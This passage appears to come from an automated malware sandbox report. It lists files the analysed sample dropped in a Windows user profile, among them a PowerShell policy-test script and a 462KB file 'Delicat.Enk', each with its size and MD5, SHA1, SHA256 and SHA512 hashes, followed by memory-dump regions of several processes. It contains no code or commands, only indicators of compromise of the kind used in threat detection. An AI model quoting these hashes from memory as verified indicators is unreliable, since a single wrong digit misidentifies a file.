      SHA256

      d30d83a1559d0339ab942a992ed37661f5059a16fcf7b2b70eebaee28116310f

      SHA512

      eec164271152d5aab44238c4f428b3be6c125bb5c79644a747c70a0ed0a88149d6ce21c5c421d319be515fa69792af7d11f81b66c5bbce7ff54f9f6e160c6824

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      4eb5fa93e5255767c0fb568bc13c9990

      SHA1

      c2b4f4952dbb24dfc40b599a622e52ec375553c6

      SHA256

      c72370e118a66bd8f339547ae315ac435c4fd0642b278416a49658000e1341d8

      SHA512

      122eb7207a307bda86f422c3053056bbcfe24d15b8ec2c023ced4d21ef12bc543b90aedced12c2343afbaa8f0232ca940e62cd320f0aac5d7a6dc241dd88385c

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lkomxjao.ixl.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\pkxcufqpjnpeqmpmdyohty
      Filesize

      4KB

      MD5

      ea70ef5c4bba96cc4ea066fc46ba2340

      SHA1

      ba321ac5b7e089dd48d6f91bb7148ba47b9a2417

      SHA256

      179361a537fca8adbfe37ec209ba021a17ea4ac9618a5146bfef121c0bb33561

      SHA512

      b98f45d2c806fa03b3d89e8257157b4af9f412d39750677e950f4706bb58f95dcbdf3b5f312dad9a20fc6f22a7bf0d9938048140776c8aae7f656b6f38cda846

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Delicat.Enk
      Filesize

      462KB

      MD5

      2b24db713797e91396a5bc619e49e7b2

      SHA1

      eff7dec19c43df6e204a32806893318469a2b103

      SHA256

      d28947b99be94a4ef690b2e3e97c2c930c16ccb0249a4916b359ba4e4fc61918

      SHA512

      2f1373d4c43f352c5fa495381da3b6fe1eb7ea8bfc6269760776194cbc82bdaf3cadbaf69f634b234686b2a162e786d5aa676a3332da95ee8e32210d8d7a9519

      Download Submit

    • memory/528-123-0x0000000009220000-0x0000000009242000-memory.dmp

      Filesize

      136KB

      Download

    • memory/528-124-0x000000000A390000-0x000000000A88E000-memory.dmp

      Filesize

      5.0MB

      Download

    • memory/528-92-0x00000000045D0000-0x0000000004606000-memory.dmp

      Filesize

      216KB

      Download

    • memory/528-93-0x0000000007190000-0x00000000077B8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/528-94-0x0000000007020000-0x0000000007042000-memory.dmp

      Filesize

      136KB

      Download

    • memory/528-95-0x00000000070C0000-0x0000000007126000-memory.dmp

      Filesize

      408KB

      Download

    • memory/528-96-0x00000000079A0000-0x0000000007A06000-memory.dmp

      Filesize

      408KB

      Download

    • memory/528-97-0x0000000007A10000-0x0000000007D60000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/528-168-0x000000000A890000-0x000000000BEFB000-memory.dmp

      Filesize

      22.4MB

      Download

    • memory/528-99-0x00000000078E0000-0x00000000078FC000-memory.dmp

      Filesize

      112KB

      Download

    • memory/528-100-0x0000000007E00000-0x0000000007E4B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/528-101-0x0000000008130000-0x00000000081A6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/528-116-0x0000000009810000-0x0000000009E88000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/528-117-0x0000000008F60000-0x0000000008F7A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/528-122-0x0000000009290000-0x0000000009324000-memory.dmp

      Filesize

      592KB

      Download

    • memory/1700-9-0x00000255ACA70000-0x00000255ACAE6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/1700-89-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1700-10-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1700-5-0x00000255AC760000-0x00000255AC782000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1700-8-0x00007FFF8B980000-0x00007FFF8C36C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/1700-0-0x00007FFF8B983000-0x00007FFF8B984000-memory.dmp

      Filesize

      4KB

      Download

    • memory/7592-378164-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/7592-378174-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/7592-378172-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

      Download

    • memory/36100-378243-0x0000000021CD0000-0x0000000021CE9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/36100-374985-0x0000000002880000-0x0000000003C03000-memory.dmp

      Filesize

      19.5MB

      Download

    • memory/36100-378240-0x0000000021CD0000-0x0000000021CE9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/36100-378244-0x0000000021CD0000-0x0000000021CE9000-memory.dmp

      Filesize

      100KB

      Download

    • memory/36100-336928-0x0000000002880000-0x0000000003C03000-memory.dmp

      Filesize

      19.5MB

      Download

    • memory/36100-334904-0x0000000002880000-0x0000000003C03000-memory.dmp

      Filesize

      19.5MB

      Download

    • memory/94776-378173-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/94776-378176-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/94776-378136-0x0000000000400000-0x0000000000478000-memory.dmp

      Filesize

      480KB

      Download

    • memory/98464-378163-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/98464-378171-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download

    • memory/98464-378175-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

      Download